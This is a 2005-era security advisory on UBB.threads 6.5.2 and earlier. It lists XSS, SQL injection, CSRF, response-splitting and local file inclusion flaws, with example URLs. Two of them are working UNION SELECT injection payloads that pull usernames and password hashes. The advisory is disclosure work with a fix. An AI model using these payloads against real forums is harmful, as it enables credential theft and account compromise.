Are you looking to have your application properly secured by an experienced professional? Contact us today for a free private consultation. We specialize in web application security, mobile security, and also offer general consultation services. Click here for more information regarding all of our security services.
UBB.threads Multiple Vulnerabilities
Vendor: Infopop Corporation
Product: UBB.threads
Version: <= 6.5.2 Beta
Website: http://www.ubbcentral.com/ubbthreads/
BID: 14050 14055
CVE: CVE-2005-2057 CVE-2005-2058 CVE-2005-2059 CVE-2005-2060 CVE-2005-2061
OSVDB: 17512 17517 17518 17521 17525
SECUNIA: 15805
PACKETSTORM: 38289
Description:
UBB Threads is a very popular forum system developed by Infopop. There are a number of vulnerabilities in UBB Threads that may allow an attacker to execute cross site scripting, http response splitting, and cross site request forgery attacks. Also, an attacker may include, execute, or read arbitrary local files. These vulnerabilities may allow for an attacker to completely compromise an installation of UBB Threads and possibly more. Users are encouraged to upgrade as soon as possible to the latest UBB Threads release.


Cross Site Scripting:
There are a large number of cross site scripting issues in UBB Threads. Due to the large number the examples I will simply put a [XSS] where an attacker might place offending code. Some examples might look like this.

http://ubbt/dosearch.php?Cat=0&Searchpage=2[XSS]&topic=
http://ubbt/newreply.php?Cat=0&Board=UBB8&Number=39818[XSS]&page=0&what=showfla
t&fpart=1&vc=1
http://ubbt/newreply.php?Cat=0&Board=UBB8&Number=39818&page=0&what=showflat[XSS]
&fpart=1&vc=1
http://ubbt/newreply.php?Cat=0&Board=UBB8&Number=39818&page=0[XSS]&what=showflat&
fpart=1&vc=1
http://ubbt/showprofile.php?Cat=0&User=7&Number=39818[XSS]&Board=UBB8&what=showflat
&page=0&fpart=1&vc=1
http://ubbt/showprofile.php?Cat=0&User=7&Number=39818&Board=UBB8[XSS]&what=showflat
&page=0&fpart=1&vc=1
http://ubbt/showprofile.php?Cat=0&User=7&Number=39818&Board=UBB8&what=showflat[XSS]&
page=0&fpart=1&vc=1
http://ubbt/showflat.php?Cat=0&Board=UBB5&Number=42173&page=0&fpart=all[XSS]
http://ubbt/showflat.php?Cat=0&Board=UBB5&Number=42173&page=0[XSS]&fpart=all
http://ubbt/showmembers.php?Cat=&like=p[XSS]&sb=1&page=1

These vulnerabilities can be used to steal sensitive information from a user, and possibly lead to malicious code execution in the context of the victims browser.


SQL Injection:
There are a number of SQL Injection issues in UBB Threads that allow for an attacker to influence, or disclose sensitive information in the underlying database. Below are some examples.

http://ubbt/download.php?Number=42227[SQL]
http://ubbt/calendar.php?Cat=7&month=6&year=2005[SQL]
http://ubbt/calendar.php?Cat=&month=7[SQL]&year=2005
http://ubbt/modifypost.phpCat=0&Username=foobar&Number=
[SQL]&Board=UBB8&page=0&what=showflat&fpart=&vc=1&Approved=yes&convert=markup
&Subject=Re%3A+Pruning+old+posts&Icon=book.gif&Body=yup&markedit=1&addsig=1&
preview=1&peditdelete=Delete+this+post


The above is just examples, and will not do anything except maybe trigger an error but I will provide a few examples of how these vulnerabilities could be exploited. First, there is an SQL Injection issue that occurs when emailing a thread to someone

http://ubbt/mailthread.php?Cat=0&Board=UBB2&Number=-99'%20UNION%20SELECT%20U_Username
,U_Password%20FROM%20w3t_Users%20WHERE%20U_Username%20=%20'victim'/*&page=0&vc=1&
fpart=1&what=showflat

Visiting a url like the one above by itself will not cause much to happen, but if you complete the form, you will notice an email arrives at the address you specified in the form, and the contents of that email are the contents you queried from the database! Also, in the private messaging feature there is another serious SQL Injection issue.

http://ubbt/viewmessage.php?Cat=&message=-99%20UNION%20SELECT%20null,U_Username,U_Password,
0,0%20FROM%20w3t_Users%20WHERE%20U_Username%20=%20'foobar'/*&status=N&box=received

A url like the one above would yield the user 'foobar' s password hash and username.

http://ubbt/addfav.php?Cat=0&Board=UBB2&main=41654[SQL]&type=reminder&Number=41654&page=
0&vc=1&fpart=1&what=showflat
http://ubbt/notifymod.php?Cat=0&Board=UBB5&Number=42173[SQL]&page=0&what=showthreaded
http://ubbt/grabnext.php?Cat=4&Board=UBB23&mode=showflat&sticky=0&dir=old&posted=1045942715[SQL]


Also, there are a few SQL Injection issues that require the post method. For example when rating a profile, or post, or anything else (they all use the same feature) you can specify arbitrary SQL statements to the "Main" parameter. Also, when conducting a search an attacker may specify arbitrary SQL statements in the "Forum[]" array and have them execute successfully with the privileges of the current mysql user.


Cross Site Request Forgery:
There are a number of CSRF issues in UBB Threads, and these issues allow for an attacker to unwillingly change their ignore, and address settings.

http://ubbt/addaddress.php?Cat=0&User=123&Board=&Number=&what=showmembers&page=1
http://ubbt/toggleignore.php?Cat=0&User=123&Board=&Number=&what=showmembers&page=1
http://ubbt/removeignore.php?Cat=&User=123
http://ubbt/removeaddress.php?Cat=&User=123

These issues really affect privacy on the forums, and make it nearly impossible to keep away from any harassing members :)


HTTP Response Splitting:
There are several HTTP Response Splitting issues in UBB Threads. These issues allow for an attacker to manipulate headers sent back to the user, and may allow for code execution in the context of the victims browser. The "Cat" parameter in the files toggleshow.php, togglecats.php, and showprofile.php are all vulnerable.


Local File Inclusion:
UBB Threads suffers from a local file inclusion vulnerability when handling language preferences extracted from the cookie. The "language" parameter is never sanitized and can thus be exploited by specifying an arbitrary file location appended with a null byte (%00). This could lead to code execution, or in most cases, file disclosure.


Solution:
An updated version of UBB threads has been released to address the previously mentioned issues, and users are strongly advised to upgrade immediately.

http://www.ubbcentral.com/boards/showflat.php/Cat/0/Number/42351/Main/42351/#Post42351

Users can visit the above url to get information regarding UBB Threads security updates.


Credits:
James Bercegay of the GulfTech Security Research Team